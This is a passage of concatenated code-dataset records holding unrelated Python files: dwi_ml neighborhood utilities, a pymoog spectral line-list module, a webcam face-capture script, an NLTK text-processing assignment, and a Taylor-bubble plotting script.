np.identity(3)\n unit_axes = np.concatenate((tmp_axes, -tmp_axes))\n\n if not isinstance(radius, Iterable):\n radius = [radius]\n\n neighborhood_vectors = []\n for r in radius:\n neighborhood_vectors.extend(unit_axes * r)\n neighborhood_vectors = torch.as_tensor(np.asarray(neighborhood_vectors),\n dtype=torch.float)\n\n return neighborhood_vectors\n\n\ndef get_neighborhood_vectors_grid(radius_vox_space: int):\n \"\"\"\n This neighborhood definition lies on a grid. Returns a list of vectors\n pointing to points surrounding the origin that mimic the original voxel\n grid, in voxel space. Ex: with radius 1, this is 26 points. With radius 2,\n it's 124 points.\n\n Note: We only support isometric voxels! Adding anisometry would also\n require remembering the voxel resolution.\n\n Parameters\n ----------\n radius_vox_space : int\n Size of the neighborhood in each direction, in voxel space. Final\n neighboorhood will be of dimension 2*radius x 2*radius x 2*radius.\n\n Returns\n -------\n neighborhood_vectors : tensor shape (N, 3)\n A list of vectors with last dimension = 3 (x,y,z coordinate for each\n neighbour per respect to the origin). The current point (0,0,0) is NOT\n included.\n \"\"\"\n if isinstance(radius_vox_space, float) and radius_vox_space.is_integer():\n radius_vox_space = int(radius_vox_space)\n assert type(radius_vox_space) == int, \"For the 'grid' neighborhood, \" \\\n \"radius must be an int. Rrecieved \" \\\n \"{}\".format(radius_vox_space)\n\n neighborhood_vectors = []\n the_range = range(-radius_vox_space, radius_vox_space + 1)\n for x, y, z in itertools.product(the_range, the_range, the_range):\n if not (x == y == z == 0): # Not adding origin; not a neighbor\n neighborhood_vectors.append([x, y, z])\n neighborhood_vectors = torch.as_tensor(np.asarray(neighborhood_vectors),\n dtype=torch.float)\n\n return neighborhood_vectors\n\n\ndef extend_coordinates_with_neighborhood(\n coords: torch.Tensor, neighborhood_vectors: torch.tensor):\n \"\"\"\n From a list of coordinates and neighborhood vectors (e.g. [up, down, left,\n right]), get a new list of coordinates with all translations applied to all\n coordinates.\n\n Parameters\n ------\n coords: tensor of shape (M, 3)\n An array of M points; [x,y,z] coordinates.\n neighborhood_vectors: tensor of shape (N, 3)\n A list of translation vectors to apply to each point in coords.\n\n Returns\n -------\n flat_coords: tensor of shape (M x (N+1), 3)\n The new coordinates with all N neighbors (N+1 including the original\n coordinates), in the same space and origin as coords.\n tiled_vectors: tensor\n The coordinates of neighbors per respect to the current coordinate\n (translation vectors).\n \"\"\"\n device = neighborhood_vectors.device\n assert coords.device == device, \"Neighborhood device is {}, but current \" \\\n \"coordinates device is {}\" \\\n .format(device, coords.device)\n\n m_coords = coords.shape[0]\n n_neighbors = neighborhood_vectors.shape[0]\n\n # 1. We repeat each coordinate to have the neighborhood size (+ 1 for\n # original coordinate) before applying translations.\n # coords = [p1 p1... p2 p2 ... ...]' (Size = [n, 3])\n flat_coords = coords.repeat_interleave(n_neighbors + 1, dim=0)\n\n # 2. We translate each point based on the translations vector.\n # Ex, if neighborhood_translations = [here, up, down, left, right, ...]\n # coords = [p1+0 p1+up p1+down ..., p2+0 p2+up, p2+down, ...]'\n # toDo. This \"cat\" happens every iteration. We can include it in\n # neighborhood vectors.\n total_neighborhood = torch.cat((torch.zeros(1, 3, device=device),\n neighborhood_vectors))\n tiled_vectors = torch.tile(total_neighborhood, (m_coords, 1))\n flat_coords += tiled_vectors\n\n return flat_coords, tiled_vectors\n","sub_path":"dwi_ml/data/processing/space/neighborhood.py","file_name":"neighborhood.py","file_ext":"py","file_size_in_byte":7568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"151262230","text":"#!/usr/bin/python\nfrom re import sub\nimport numpy as np\nimport pandas as pd\nimport os\nimport platform\nfrom . import private\nfrom . import synth\nfrom . import weedout\nfrom . import rundir_num\n\nMOOG_path = '{}/.pymoog/moog_nosm/moog_nosm_NOV2019/'.format(os.environ['HOME'])\nMOOG_run_path = '{}/.pymoog/rundir/'.format(os.environ['HOME'])\nMOOG_file_path = '{}/.pymoog/files/'.format(os.environ['HOME'])\n\n## Convert the element column to element specics\n\ndef save_linelist(linelist_all, sub_ll_name, wav_start=None, wav_end=None, header=None, negative=False):\n '''\n Save the linelist in MOOG format into specified position.\n \n Parameters\n ----------\n linelist_all : pandas.Dataframe\n The Dataframe of linelist in MOOG format\n sub_ll_name : str\n The name of the line list to be saved into.\n wav_start : float\n Start wavelength of the line list.\n end_start : float\n End wavelength of the line list.\n type : str, = 'vald'\n Type of the line list. Now only 'vald' is supported.\n negative : bool\n Switch to permit negative wavelength. \n '''\n \n # Crop the line list according to wavelength, if needed.\n if not(negative):\n index = linelist_all['wavelength'] > 0\n else:\n index = np.abs(linelist_all['wavelength']) >= 0\n if wav_start != None:\n index = index & (linelist_all['wavelength'] > wav_start)\n if wav_end != None:\n index = index & (linelist_all['wavelength'] < wav_end) \n \n sub_linelist = linelist_all[index]\n sub_linelist.reset_index(drop=True, inplace=True)\n \n # Judge if the length of the line list is 0; if so raise an error.\n if len(sub_linelist) == 0:\n raise ValueError('The length of line list is 0. Consider enalrge the wavelength or check the input line list.')\n \n # Decidcde which format to save the linelist according to C6 value.\n if np.any(abs(sub_linelist['C6'].values) > 1e-25):\n output_format = '%10.3f%10.5f%10.4f%10.3f%10.3f%10.3f%10.3f'\n elif np.any(abs(sub_linelist['C6'].values) < 1e-25):\n output_format = '%10.3f%10.5f%10.4f%10.3f%10.2E%10.3f%10.3f'\n \n # Remove the last column if no EW values.\n if len(sub_linelist.columns) == 6:\n output_format = output_format[:-6]\n np.savetxt(sub_ll_name, np.array(sub_linelist), fmt=output_format)\n if 'linux' in platform.system().lower():\n run_status = private.subprocess.run(['sed', '-i', 's/nan/ /g', sub_ll_name], capture_output=True)\n elif 'darwin' in platform.system().lower():\n run_status = private.subprocess.run(['sed', '-i', \"''\", 's/nan/ /g', sub_ll_name], capture_output=True)\n else:\n # Same as Linux\n run_status = private.subprocess.run(['sed', '-i', 's/nan/ /g', sub_ll_name], capture_output=True)\n if run_status.returncode != 0:\n raise ValueError('NaN may not be removed correctly in the line list. The stderr text is: {}'.format(run_status.stderr)) \n if header == None:\n header = 'Linelist'\n if 'linux' in platform.system().lower():\n run_status = private.subprocess.run(['sed', '-i', '1 i\\{}'.format(header), sub_ll_name], capture_output=True)\n elif 'darwin' in platform.system().lower():\n run_status = private.subprocess.run(['sed', '-i', \"''\", '1 i\\{}'.format(header), sub_ll_name], capture_output=True)\n else:\n # Same as linux\n run_status = private.subprocess.run(['sed', '-i', '1 i\\{}'.format(header), sub_ll_name], capture_output=True)\n\ndef read_linelist(linelist_name, loggf_cut=None, mode='default'):\n '''\n Read the post-processed linelist.\n \n Parameters\n ----------\n linelist_name : str\n The MOOG format line list\n loggf_cut : float, optional\n Cut on loggf (only save for the lines with loggf > loggf_cut)\n mode : str, default 'default'\n Reading mode for reading line-list. 'default' will first try to read using 'npy' mode then 'ascii' mode if the corresponding .npy file does not exist. Note that the efficiency of 'npy' mode is much higher than 'ascii' mode.\n '''\n \n available_line_list = ['ges', 'ges_hfs_iso', 'ges_nohfs_noiso', 'vald_3000_24000', 'vald_winered', 'mb99_j', 'mb99_k', 'apogee', 'kurucz', 'kurucz_winered']\n\n if (linelist_name[-5:] != '.list' and linelist_name[-4:] != '.npy') and linelist_name in available_line_list:\n # Read built-in line list\n if linelist_name == 'ges':\n linelist_name = 'ges_hfs_iso'\n if mode == 'default':\n linelist_name_full = MOOG_file_path + '/pymoog_lf/linelist/{}/{}.npy'.format(linelist_name.split('_')[0], linelist_name)\n mode = 'npy'\n if not(os.path.exists(linelist_name_full)):\n linelist_name_full = MOOG_file_path + '/pymoog_lf/linelist/{}/{}.list'.format(linelist_name.split('_')[0], linelist_name)\n mode = 'ascii'\n if not(os.path.exists(linelist_name_full)):\n raise ValueError('Neither npy nor ascii format of internal line list exists.')\n elif mode == 'npy':\n linelist_name_full = MOOG_file_path + '/pymoog_lf/linelist/{}/{}.npy'.format(linelist_name.split('_')[0], linelist_name)\n elif mode == 'ascii':\n linelist_name_full = MOOG_file_path + '/pymoog_lf/linelist/{}/{}.list'.format(linelist_name.split('_')[0], linelist_name)\n else:\n raise ValueError('mode must be \"default\", \"npy\" or \"ascii\".')\n elif linelist_name[-5:] == '.list':\n linelist_name_full = linelist_name\n mode = 'ascii'\n elif linelist_name[-4:] == '.npy':\n linelist_name_full = linelist_name\n mode = 'npy'\n else:\n raise ValueError(\"Built in line list type not recognized. Please use one of the following:\\n 'ges', 'ges_hfs_iso', 'ges_nohfs_noiso', 'vald_3000_24000', 'vald_winered', 'mb99_j', 'mb99_k', 'kurucz', 'kurucz_winered' or 'apogee'.\")\n \n if mode == 'npy':\n linelist_array = np.load(linelist_name_full, allow_pickle=True)\n linelist = pd.DataFrame(linelist_array, columns=['wavelength', 'id', 'EP', 'loggf', 'C6', 'D0', 'EW'])\n elif mode == 'ascii':\n linelist = pd.read_fwf(linelist_name_full, colspecs=[(0,11), (11,21), (21,31), (31,41), (41,51), (51,61), (61,71)], names=['wavelength', 'id', 'EP', 'loggf', 'C6', 'D0', 'EW'], skiprows=1)\n \n # MOOG seems to crash if there is line with EP larger than 50eV, so they are removed.\n # Need to be test for other line lists\n linelist = linelist[(linelist['EP'] <= 50)]\n if loggf_cut != None:\n linelist = linelist[(linelist['loggf'] >= loggf_cut)]\n linelist.reset_index(drop=True, inplace=True)\n return linelist\n\ndef find_lines(linelist_keep, linelist_all, max_del_wav=0.05):\n line_index_keep = []\n for i in linelist_keep.index:\n indice = (np.abs(linelist_all['wavelength'] - linelist_keep.loc[i, 'wavelength']) < max_del_wav)\n for col in ['id', 'EP']:\n # Note: some difference in loggf may appear in different version of the line list; so it is better to keep the version same, and here loggf is not used as the criteria for distinguishing lines.\n indice = indice & (np.abs(linelist_all[col] - linelist_keep.loc[i, col]) < 0.001)\n if len(linelist_all[indice]) == 0:\n raise ValueError('No match line found.')\n else:\n line_index_keep.append(linelist_all[indice].index.values[0])\n return line_index_keep\n\ndef find_single_dominant_line(line_wav_input, teff, logg, m_h, resolution, line_list='ges', weedout_switch=False, search_half_width=0.5, include_strong_linelist=False, r_blen_thres=0.1, abun_change=None):\n\n '''\n Find the dominant line from a line list.\n\n Parameters\n ----------\n line_wav_input : float\n Central wavelength for the searching.\n teff : float\n The effective temperature of the model\n logg : float\n logg value of the model\n m_h : float\n [M/H] value (overall metallicity) of the model\n resolution : float\n Resolution of the synthetic spectra; this will passed to MOOG and convolute with initial spectra.\n line_list : str or pd.DataFrame, default vald_3000_24000 \n The name of the linelist file.\n weedout_switch : bool or float, default False\n The switch for running weedout driver before synth. If False then weedout is not run; if True the weedout is run with kappa_ratio=0.01, and if a float (> 0 and < 1) is given then weedout is run with the kappa_ratio set as the number.\n search_half_width : float, default 0.5\n The +- width for searching the dominant line.\n include_strong_linelist : bool, default False\n Whether include all the linelist after weedout as a separate output.\n r_blen_thres : float, default 0.1\n The threshold of blending ratio. Only the line with blending ratio smaller than r_blen_thres can be selected as dominant line.\n abun_change : dict of pairs {int:float, ...}\n Abundance change, have to be a dict of pairs of atomic number and [X/Fe] values.\n\n Returns\n ----------\n dominant_line : pandas.DataFrame \n The dataframe containing the dominant line.\n linelist_keep : pandas.DataFrame, optional\n The line list after weedout. Only appear when include_strong_linelist is True.\n '''\n\n # Establish the linelist\n linelist_all = read_linelist(line_list)\n linelist_all = linelist_all[np.abs(linelist_all['wavelength']-line_wav_input) < search_half_width]\n\n # Calculate the blending ratio\n s = synth.synth(teff, logg, m_h, line_wav_input-search_half_width-1, line_wav_input+search_half_width+1, resolution, line_list=line_list)\n s.prepare_file(abun_change=abun_change)\n # Whole spectra \n s.run_moog()\n s.read_spectra()\n wav_all, flux_all = s.wav, s.flux\n\n # weedout lines\n if weedout_switch != False:\n w = weedout.weedout(teff, logg, m_h, line_wav_input-search_half_width, line_wav_input+search_half_width, line_list=line_list, kappa_ratio=weedout_switch)\n w.prepare_file()\n w.run_moog()\n \n # Target line exclude\n if weedout_switch:\n w.read_linelist()\n linelist_keep = w.keep_list\n else:\n linelist_keep = linelist_all\n \n line_index_keep = find_lines(linelist_keep, linelist_all)\n\n r_blend_ratio_list = []\n for line_index in line_index_keep:\n s = synth.synth(teff, logg, m_h, line_wav_input-search_half_width-1, line_wav_input+search_half_width+1, \n resolution, line_list=line_list)\n s.prepare_file(abun_change=abun_change)\n linelist_exclude = linelist_all.drop(line_index).reset_index(drop=True)\n save_linelist(linelist_exclude, s.rundir_path + 'line.list')\n s.run_moog()\n s.read_spectra(remove=False)\n wav_exclude, flux_exclude = s.wav, s.flux\n\n # Target line only\n linelist_target = linelist_all.loc[line_index:line_index].reset_index(drop=True)\n line_wavlength = linelist_target.loc[0, 'wavelength']\n line_loggf = linelist_target.loc[0, 'loggf']\n line_EP = linelist_target.loc[0, 'EP']\n if abun_change is not None:\n s.prepare_file(abun_change=abun_change)\n else:\n s.prepare_file()\n save_linelist(linelist_target, s.rundir_path + 'line.list')\n s.run_moog()\n s.read_spectra()\n wav_target, flux_target = s.wav, s.flux\n\n # Calculate the EW and blending fraction\n EW = (np.sum(1-flux_all)*0.02 - np.sum(1-flux_exclude)*0.02) * 1000\n depth = 1 - np.min(flux_all[np.abs(wav_all-line_wavlength) <= 0.03])\n r_blend_ratio = (1-flux_exclude[np.argmin(np.abs(wav_exclude-line_wavlength))]) / (1-flux_all[np.argmin(np.abs(wav_all-line_wavlength))])\n\n r_blend_ratio_list.append(r_blend_ratio)\n\n linelist_keep['r_blend_depth'] = r_blend_ratio_list\n\n if len(line_index_keep) > 0:\n try:\n dominant_line_index = np.abs(linelist_keep.loc[linelist_keep['r_blend_depth'] < r_blen_thres, 'wavelength'] - line_wav_input).sort_values().index[0]\n dominant_line = linelist_keep.loc[dominant_line_index:dominant_line_index].reset_index(drop=True)\n except IndexError:\n # No dominant line is found\n dominant_line = pd.DataFrame(np.array([np.nan]*8)).T\n dominant_line.columns = ['wavelength', 'id', 'EP', 'loggf', 'C6', 'D0', 'EW', 'r_blend_depth']\n else:\n # No line is found\n dominant_line = pd.DataFrame(np.array([np.nan]*8)).T\n dominant_line.columns = ['wavelength', 'id', 'EP', 'loggf', 'C6', 'D0', 'EW', 'r_blend_depth']\n\n if include_strong_linelist:\n return dominant_line, linelist_keep\n else:\n return dominant_line","sub_path":"build/lib/pymoog/line_data.py","file_name":"line_data.py","file_ext":"py","file_size_in_byte":12803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"22920956","text":"import dlib\r\nimport cv2\r\nimport os\r\nimport time\r\n\r\n# 通过摄像头获取人脸 需要摄像头范围里只有一个人脸 只识别一张脸\r\n\r\n# faces 存储目录 名为 faces1、faces2 ...\r\nfaces_save_path = \"../faces_img/faces\"\r\n\r\n# 首先获取faces的name\r\nfaces_name = input(\"Your name:\")\r\n\r\n\r\ndef create_faces_save_dir(path):\r\n # 新建目录存放faces图像\r\n i = 1\r\n while True:\r\n if os.path.exists(path + str(i)):\r\n i += 1\r\n else:\r\n break\r\n os.mkdir(path + \"\" + str(i))\r\n return str(i)\r\n\r\n\r\n# 得到当前创建目录的id\r\nfaces_dir_id = create_faces_save_dir(faces_save_path)\r\n# 目录加上id\r\nfaces_save_path += faces_dir_id\r\n\r\n# 人脸检测器\r\ndetector = dlib.get_frontal_face_detector()\r\n\r\ncam = cv2.VideoCapture(0)\r\ncolor_green = (0, 255, 0)\r\nline_width = 1\r\n# 累计捕捉人脸数\r\nfaces_count = 0\r\nstart_time = time.time()\r\n\r\nwhile True:\r\n _, img = cam.read()\r\n\r\n # esc to quit or faces_count reach 40\r\n if cv2.waitKey(1) == 27 or faces_count >= 50:\r\n print(\"ESC or faces get completed.\")\r\n break\r\n\r\n # 0.1 秒捕获一张 预计 5 秒左右完成 50 张\r\n end_time = time.time()\r\n dets = detector(img)\r\n if end_time - start_time > 0.1:\r\n # 只捕获屏幕内只有一张人脸时的图像\r\n if len(dets) == 1:\r\n faces_count += 1\r\n # 保存图像\r\n cv2.imwrite(\"{}/faces({}){}.{}.jpg\".format(faces_save_path,\r\n faces_name, faces_dir_id,\r\n str(faces_count)), img)\r\n # cv2.imwrite(faces_save_path + \"/faces\"+faces_dir_id +\r\n # \".\"+str(faces_count)+\".jpg\", img)\r\n if dets:\r\n cv2.rectangle(img, (dets[0].left(), dets[0].top()),\r\n (dets[0].right(), dets[0].bottom()),\r\n color_green, line_width)\r\n\r\n cv2.namedWindow('get faces', 2)\r\n cv2.imshow('get faces', img)\r\ncam.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"work/faces_get.py","file_name":"faces_get.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"57160098","text":"import nltk\r\n\r\nnltk.download('punkt')\r\nnltk.download('reuters')\r\nnltk.download('gutenberg')\r\nnltk.download('averaged_perceptron_tagger')\r\nnltk.download('universal_tagset')\r\n\r\n# Task 1 (1 mark)\r\nfrom collections import Counter\r\n\r\n\r\ndef stem_counter(text):\r\n \"\"\"Return a Python Counter of stems\r\n >>> c1 = stem_counter(\"Here is sentence 1. Here is sentence 2.\")\r\n >>> sorted(c1.most_common())\r\n [('.', 2), ('1', 1), ('2', 1), ('here', 2), ('is', 2), ('sentenc', 2)]\r\n >>> emma = nltk.corpus.gutenberg.raw('austen-emma.txt')\r\n >>> c2 = stem_counter(emma[:1000])\r\n >>> sorted(c2.most_common(4))\r\n [(',', 13), ('had', 7), ('of', 12), ('the', 7)]\r\n >>> c2['had']\r\n 7\r\n \"\"\"\r\n\r\n #create NLTK porter stemmer\r\n ps = nltk.PorterStemmer()\r\n\r\n #list which holds word stems\r\n word_stems = []\r\n\r\n for sentence in nltk.sent_tokenize(text):\r\n for word in nltk.word_tokenize(sentence):\r\n #add the stemmed word (in lower case) to the word stems list\r\n word_stems.append(ps.stem(word.lower()))\r\n\r\n counter = Counter(word_stems)\r\n return counter\r\n\r\n\r\n# Task 2 (1 mark)\r\ndef distinct_words_of_pos(text, pos):\r\n \"\"\"Return the sorted list of distinct words with a given part of speech\r\n >>> emma = nltk.corpus.gutenberg.raw('austen-emma.txt')\r\n >>> d = distinct_words_of_pos(emma[:1000], 'NOUN')\r\n >>> len(d)\r\n 42\r\n >>> d[:10]\r\n ['[', ']', 'affection', 'austen', 'between', 'blessings', 'caresses', 'clever', 'consequence', 'daughters']\r\n \"\"\"\r\n\r\n INDEX_WORD = 0\r\n INDEX_POS = 1\r\n\r\n #sorted list\r\n sorted_list = []\r\n\r\n #text to sentences\r\n text_sentences = [nltk.word_tokenize(s) for s in nltk.sent_tokenize(text)]\r\n\r\n #give words pos tags (within sentences)\r\n text_sentences_tags = nltk.pos_tag_sents((text_sentences), tagset='universal')\r\n\r\n for tst_list in text_sentences_tags:\r\n for element in tst_list:\r\n #if tag matches pos\r\n if element[INDEX_POS] == pos:\r\n #ensure no duplicates\r\n if element[INDEX_WORD] not in sorted_list:\r\n #add the word only\r\n sorted_list.append(element[INDEX_WORD])\r\n\r\n #convert words to lower case\r\n sorted_list = [x.lower() for x in sorted_list]\r\n\r\n #sort the list alphabetically\r\n sorted_list.sort()\r\n\r\n return sorted_list\r\n\r\n\r\n# Task 3 (1 mark)\r\ndef most_common_pos_bigram(text):\r\n \"\"\"Return the most common PoS bigram\r\n >>> most_common_pos_bigram(\"I saw the man with a telescope\")\r\n ('DET', 'NOUN')\r\n >>> emma = nltk.corpus.gutenberg.raw('austen-emma.txt')\r\n >>> most_common_pos_bigram(emma[:1000])\r\n ('NOUN', '.')\r\n \"\"\"\r\n\r\n import collections\r\n\r\n INDEX_POS = 1\r\n FIRST_ELEMENT = 0\r\n\r\n\r\n bigram_list = []\r\n\r\n # text to sentences\r\n text_sentences = [nltk.word_tokenize(s) for s in nltk.sent_tokenize(text)]\r\n\r\n # give words pos tags (within sentences)\r\n text_sentences_tags = nltk.pos_tag_sents((text_sentences), tagset='universal')\r\n\r\n for tst_list in text_sentences_tags:\r\n for element in tst_list:\r\n bigram_list.append(element[INDEX_POS])\r\n\r\n\r\n bigrams = list(nltk.bigrams(bigram_list))\r\n bigrams_count = collections.Counter(bigrams)\r\n\r\n return (bigrams_count.most_common(1)[FIRST_ELEMENT][FIRST_ELEMENT])\r\n\r\n\r\n# Task 4 (2 marks)\r\nimport re\r\n\r\n\r\ndef my_tokeniser(text):\r\n \"\"\"Return the tokens\r\n >>> my_tokeniser(\"This is a sentence\")\r\n ['This', 'is', 'a', 'sentence']\r\n \"\"\"\r\n\r\n regexp = r'''([\\w]+([-/.,']*[\\w])*)'''\r\n\r\n items = []\r\n\r\n for all in re.findall(regexp, text):\r\n items.append(all[0])\r\n\r\n return items\r\n\r\n# - # - # - # - # - # - # - # - # - # - # - # - # - # - # - # - # - # - # - # -\r\n# DO NOT MODIFY THE CODE BELOW\r\ndef baseline_tokeniser(text):\r\n \"A baseline tokeniser\"\r\n regexp = r'''[^\\s]+'''\r\n return re.findall(regexp, text)\r\n\r\n\r\ndef false_negatives(tokens, target):\r\n \"\"\"Return false negatives\r\n False negatives are items from the target that were not detected\r\n as tokens\"\"\"\r\n return list(set(target) - set(tokens))\r\n\r\n\r\ndef false_positives(tokens, target):\r\n \"\"\"Return the false positives\r\n False positives are the items that were wrongly identified as tokens\"\"\"\r\n return list(set(tokens) - set(target))\r\n\r\n\r\ndef my_score(raw, tokens, target):\r\n fn = false_negatives(tokens, target)\r\n fp = false_positives(tokens, target)\r\n score = len(fn) / len(target) + len(fp) / len(target)\r\n baseline_results = baseline_tokeniser(raw)\r\n fn_baseline = false_negatives(baseline_results, target)\r\n fp_baseline = false_positives(baseline_results, target)\r\n score_baseline = len(fn_baseline) / len(target) + len(fp_baseline) / len(target)\r\n return max(0, 2 * (score_baseline - score) / score_baseline)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import doctest\r\n\r\n doctest.testmod()\r\n raw_reuters = nltk.corpus.reuters.raw(categories=\"corn\")\r\n words_reuters = [w for s in nltk.sent_tokenize(raw_reuters)\r\n for w in nltk.word_tokenize(s)]\r\n\r\n score = my_score(raw_reuters, my_tokeniser(raw_reuters), words_reuters)\r\n if score <= 0:\r\n rounded_score = 0\r\n elif score > 0 and score <= 0.5:\r\n rounded_score = 0.5\r\n elif score > 0.5 and score <= 1:\r\n rounded_score = 1\r\n elif score > 1 and score <= 1.5:\r\n rounded_score = 1.5\r\n else:\r\n rounded_score = 2\r\n\r\n print(\"Score of your tokeniser: %1.3f Rounded: %1.1f\" % (score,\r\n rounded_score))\r\n","sub_path":"comp348/assignment_1/a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"649026447","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\n# this file use to draw the images to explain\n# how to get the volume of the bubbles\n\nfrom __future__ import unicode_literals\nimport os\nimport sys\nimport numpy as np\nimport math\nimport matplotlib \nimport matplotlib.pyplot as plt\nimport pylab\nimport argparse\nimport string\nimport math\nimport re\nimport operator\nfrom scipy import ndimage\n\n\nfrom PIL import Image\nfrom PIL import ImageEnhance\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom matplotlib.patches import Arc\n\n#from DataP import DataProcess\n#import TaylorCorrelation as TC\n#import lookup as LOOKUP\n\nmatplotlib.rcParams['text.usetex'] = True\nmatplotlib.rcParams['text.latex.unicode'] = True\nmatplotlib.rcParams['font.family'] = 'serif'\nmatplotlib.rcParams['font.size'] = 10\nmatplotlib.rcParams['xtick.direction'] = 'in'\nmatplotlib.rcParams['ytick.direction'] = 'in'\nmatplotlib.rcParams['figure.dpi'] = 50\nmatplotlib.rcParams['figure.dpi'] = 50\n\nCWP = os.path.abspath(\"./\")\ndir_list = [60,70,80,90,95]\ncase = [1,2,3,4,5,6,7]\na = 2\ni = 0\nwhile i < 7: \n try:\n PATH_REFERENCE = os.path.abspath('/media/lguo/Elements/calculation/Taylor_bubble/2D/singularity/concave-parabolic/expansion/{}/{}/taylor_2D'.format(str(dir_list[a]),str(case[i])))\n PATH_REFERENCE_1 = os.path.abspath('/media/lguo/Elements/calculation/test-cases/no-phase-change/taylor-bubble/2D/sudden_expansion_same/60/4/taylor_2D/velocity')\n PATH_INTERFACE = PATH_REFERENCE + '/interface'\n PATH_VELOCITY = PATH_REFERENCE + '/velocity'\n PATH_OUT = PATH_REFERENCE\n #PATH_COM = os.path.abspath(\"/media/lguo/Elements1/writing/Article/elsarticle-taylor/figure/2D/velocity_vector/straight\")\n PATH_COM = os.path.abspath(\"/media/lguo/Elements/writing/thesis-part/chapter-5/parabolic-concave/expansion/figure\")\n PATH_FIG = PATH_COM + '/{}/{}-{}'.format(str(dir_list[a]),str(dir_list[a]),str(case[i]))\n PATH_FIG_SAVE = os.path.abspath('/media/lguo/Elements/phd-manuscript/thesis-manuscript/Taylor-bubble/latex/elsarticle-taylor/figure/mesh/mesh')\n if not os.path.exists(PATH_COM):\n os.makedirs(PATH_COM)\n if not os.path.exists(PATH_FIG):\n os.makedirs(PATH_FIG)\n\n def get_sur(filename):\n fn = os.path.join(PATH_REFERENCE_1 , filename)\n sur = []\n with open(fn, 'r') as file:\n seg = []\n for line in file.readlines():\n line = line.rstrip('\\n')\n l = line.split(' ')\n if len(l) == 2:\n #print float(l[0]), float(l[1])\n seg.append([float(l[0]), float(l[1])])\n else:\n segn = seg[:]\n sur.append(segn)\n seg = []\n return sur\n\n def get_out(filename):\n fn = os.path.join(PATH_OUT, filename)\n sur = []\n with open(fn, 'r') as file:\n seg = []\n for line in file.readlines():\n line = line.rstrip('\\n')\n l = line.split(' ')\n if len(l) == 3:\n #print float(l[0]), float(l[1])\n seg.append([float(l[0]), float(l[1]),float(l[2])])\n else:\n segn = seg[:]\n sur.append(segn)\n seg = []\n return sur\n\n def get_sur_1(time):\n fn = os.path.join(PATH_INTERFACE, 'interface-%g' % time)\n sur = []\n with open(fn, 'r') as file:\n seg = []\n for line in file.readlines():\n line = line.rstrip('\\n')\n l = line.split(' ')\n if len(l) == 2:\n #print float(l[0]), float(l[1])\n seg.append([float(l[0]), float(l[1])])\n else:\n segn = seg[:]\n sur.append(segn)\n seg = []\n return sur\n\n def get_sur_reference(filename):\n fn = os.path.join(PATH_REFERENCE, filename)\n arrs = []\n strr = ''\n with open(fn, 'r') as file:\n for line in file:\n if '1e+30' in line:\n line=line.replace('1e+30','0')\n strr += line\n with open(fn, 'w') as file:\n file.write(strr)\n with open(fn, 'r') as file:\n for line in file.readlines():\n line = line.strip().strip('\\n')\n l = line.split(' ')\n #print float(l[0]), float(l[1]),float(l[2]),float(l[3])\n arrs.append([float(l[0])-8, float(l[1]),float(l[2]),float(l[3])])\n return arrs\n\n def get_sur_2(time):\n fn = os.path.join(PATH_VELOCITY, 'vprof-%.1f' % time)\n arrs = []\n strr = ''\n with open(fn, 'r') as file:\n for line in file:\n if '1e+30' in line:\n line=line.replace('1e+30','0')\n strr += line\n with open(fn, 'w') as file:\n file.write(strr)\n with open(fn, 'r') as file:\n for line in file.readlines():\n line = line.strip().strip('\\n')\n l = line.split(' ')\n #print float(l[0]), float(l[1]),float(l[2]),float(l[3])\n arrs.append([float(l[0])-8, float(l[1]),float(l[2]),float(l[3])])\n return arrs\n\n def get_bubble_head(sur):\n maxx = sur[0][0][0]\n for seg in sur:\n x1 = seg[0][0]\n y1 = seg[0][1]\n x2 = seg[1][0]\n y2 = seg[1][1]\n if x1 > maxx:\n maxx = x1\n if x2 > maxx:\n maxx = x2\n return maxx\n\n def get_bubble_tail(sur):\n minn = sur[0][0][0]\n for seg in sur:\n x1 = seg[0][0]\n y1 = seg[0][1]\n x2 = seg[1][0]\n y2 = seg[1][1]\n if x1 < minn:\n minn = x1\n if x2 < minn:\n minn = x2\n return minn\n\n\n def plot_sur(plt, sur, sig, color):\n \n for seg in sur:\n x1 = seg[0][0]\n x2 = seg[1][0]\n y1 = seg[0][1]\n y2 = seg[1][1]\n plt.plot([y1, y2], [x1 - sig, x2 - sig], color,lw = 3)\n res, = plt.plot([-y1, -y2], [x1- sig, x2 - sig], color, lw = 3)\n return res\n '''\n def context2array(sur):\n return np.matrix([map(float, re.split('\\s+', ln.strip()))\n for ln in sur.splitlines() if ln.strip()])'''\n\n\n def plot_contour(x_dim, y_dim, x_steps, y_steps, scalar_field, v_min, v_max, levels=None):\n from matplotlib import cm\n x, y = np.mgrid[-x_dim/2:x_dim/2:x_steps*1j, -y_dim/2:y_dim/2:y_steps*1j]\n cs = plt.contourf(x, y, scalar_field, zorder=1, cmap=plt.cm.jet, extent=[-x_dim/2.0, x_dim/2.0, -y_dim/2.0, y_dim/2.0], vmin=v_min, vmax=v_max, levels=levels)\n plt.colorbar(cs)\n return cs.levels\n\n\n def plot_velocity(plt, sur):\n \n from matplotlib.colors import LogNorm\n\n soa =np.array(sur) \n X,Y,U,V = zip(*soa)\n M = np.hypot(U, V)\n ax = plt.gca()\n YN = np.array([-val for val in Y])\n ax.quiver(Y,X,V,U,M, units = 'xy',angles='xy',scale_units='xy', scale=20,cmap=plt.cm.jet,clim=(0,2.5))\n qq=ax.quiver(YN,X,V,U,M,units = 'xy', angles='xy',scale_units='xy',scale=20,cmap=plt.cm.jet,clim=(0,2.5))\n #cbar = plt.colorbar(qq,shrink=0.9,aspect=25)\n #cbar_ticks = np.linspace(0., 2., num=11, endpoint=True) \n #cbar.set_ticks(cbar_ticks) \n #cbar.ax.set_ylabel('$U^*$')\n\n\n def out_data(filename):\n fn = os.path.join(PATH_OUT , filename)\n seg = []\n with open(fn, 'r') as file:\n for line in file.readlines():\n line = line.rstrip('\\n')\n l = line.split(' ')\n if len(l) == 26:\n #print float(l[0]), 